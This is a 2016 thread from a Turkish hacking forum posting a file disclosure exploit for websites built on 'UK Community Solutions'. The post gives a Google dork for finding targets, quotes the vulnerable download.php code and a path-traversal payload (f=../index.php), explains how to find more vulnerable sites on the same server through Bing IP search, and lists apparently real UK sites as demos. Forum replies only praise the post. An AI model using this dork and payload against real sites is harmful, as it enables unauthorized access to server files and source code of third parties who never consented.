Turkhackteam.net/org - Turkish Hacking & Security Platform...  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform... >
Turkhackteam Under Ground
> Exploitler > Bug Researchers

Bug Researchers Yeni bulunan açıklar.


"UK Community Solutions" File Disclosure #BugResearchers

Bug Researchers

Yeni Konu aç Cevapla
 
Seçenekler
Alt 20-06-2016   #1
  • Offline
  • Forumdan Uzaklaştırıldı
  • Genel Bilgiler
Üyelik tarihi
Feb 2012
Yaş
15
Mesajlar
Konular


  
"UK Community Solutions" File Disclosure #BugResearchers


{'"UK Community Solutions" File Disclosure Vuln.',
'2016/06/19',
'Web App. Security',
'@efeoglu_e'}


Kod:
##
# 0x00 (Exploit Detaylari)
##
# Baslik: "UK Community Solutions" File Disclosure
# Yazar: d3atr4x
# Kategori: Web Aplikasyon Guvenligi
# GHDB Dork: 'inurl:"download.php?f=" intext:"Community Solutions" site:co.uk'
# Tarih: 2016/06/20
# Iletisim: @efeoglu_e
##

##
# Gr££tz t0: TurkHackTeam.Org/Net
# THT #Bug Researchers
##

##
#0x10 (Aciklama)
##
# Yukaridaki GHDB anahtar kelime dizisini, Google arama
# motoru uzerinde aratarak karsiniza cikan web sitelerinde
# yer alan "File Disclosure" zafiyetini somurebilirsiniz.
# Zafiyet, "download.php" dosyasinda yer alan asagidaki
# kod blogundan kaynaklanmaktadir.
##

##
# ..code
# $filename = $_REQUEST["f"]; 
# $download_dir = "files"; 
# $path = $download_dir. "/". $filename;
# ..code
# $size = filesize($path); 
# header('Content-Type: application/octet-stream'); 
# header('Content-Disposition: attachment; filename='.$filename); 
# header('Content-Length: '.$size); 
# readfile($path);
# ..code  
##

##
# Herhangi bir guvenlik onlemi alinmaksizin yapilan indirme
# islemi neticesinde, hedef web sayfasinin alt dizinlerindeki
# dosyalara "f" bayragiyla gonderilen payloadlar yardimi ile 
# ulasilabilmektedir. Yani asagidaki gibi bir HTTP GET istegi
# ile dosya indirilebilmektedir. 
##

##
# 0x20 (PoC)
##
# http://www.hedef.co.uk/download.php?f=../index.php
##

##
# Ayrıca zafiyet, sunucuda yer alan diğer web sitelerinin 
# çoğunda da bulunmaktadır. Bing arama motoruna, 
# zafiyeti barındıran herhangi bir web sitesinin ip 
# adresi aşağıdaki gibi yazılmalıdır.
##

##
# ip: [IP Addr.]
# ip: 0.0.0.0
##

##
# 0x30 (Demo)
##
# http://www.bacommunitysolutions.co.u...f=../index.php
# http://www.btgcommunitysolutions.co....f=../index.php
# http://www.doncastercommunitysolutio...f=../index.php
# http://www.dpht.co.uk/download.php?f=../index.php
##

##
# Sevgiler, Par4d0x1D.
##
    

Konu Par4d0x1D tarafından (20-06-2016 Saat 09:46 ) değiştirilmiştir..
Offline
 
Alıntı ile Cevapla
Alt 20-06-2016   #2
  • Offline
  • Forumdan Uzaklaştırıldı
  • Genel Bilgiler
Üyelik tarihi
Jun 2016
Mesajlar
Konular
3


  

#BugResearchers kulübünün ilk konusu ,eline sağlık..
    

Konu ix Tr tarafından (20-06-2016 Saat 12:18 ) değiştirilmiştir..
Offline
 
Alıntı ile Cevapla
Alt 20-06-2016   #3
  • Offline
  • Genel Kurmay Başkanı
  • Genel Bilgiler
Üyelik tarihi
Jan 2013
Nereden
İstanbul
Mesajlar
Konular


  

Ellerine sağlık kardeşim
    


__________________

Sizin dediğiniz ”Vatan” dağda başlayıp çöplükte biter. Bizim bildiğimiz ”Vatan” yürekte başlayıp ”ŞEHADETLE” biter!


Offline
 
Alıntı ile Cevapla
Alt 20-06-2016   #4
  • Offline
  • Forumdan Uzaklaştırıldı
  • Genel Bilgiler
Üyelik tarihi
Dec 2015
Mesajlar
Konular


  

Ellerine sağlık
    
Offline
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
You may not post attachments
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-KodlarıKapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından açılmaktadır.
Bu konular yönetimimiz tarafından takip edilsede gözden kaçabilen telif hakkı olan veya mahkeme kararı çıkmış konular sitemizde bulunabilir. Bu tür konuları bize turkhackteamiletisim [at] gmail.com adresine mail atarak bildirdiğiniz takdirde en kısa sürede konular hakkında gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com


Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz, bu sitelerin güvenlik açıklarını site sahibine bildirmek için çaba sarfeder.
Turkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Turkhackteam sorumlu değildir. Sitelerinize Turkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.




Powered by vBulletin® Copyright ©2000 - 2017

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı



Google Links



Search Engine Friendly URLs by vBSEO 3.6.0 ©2011, Crawlability, Inc.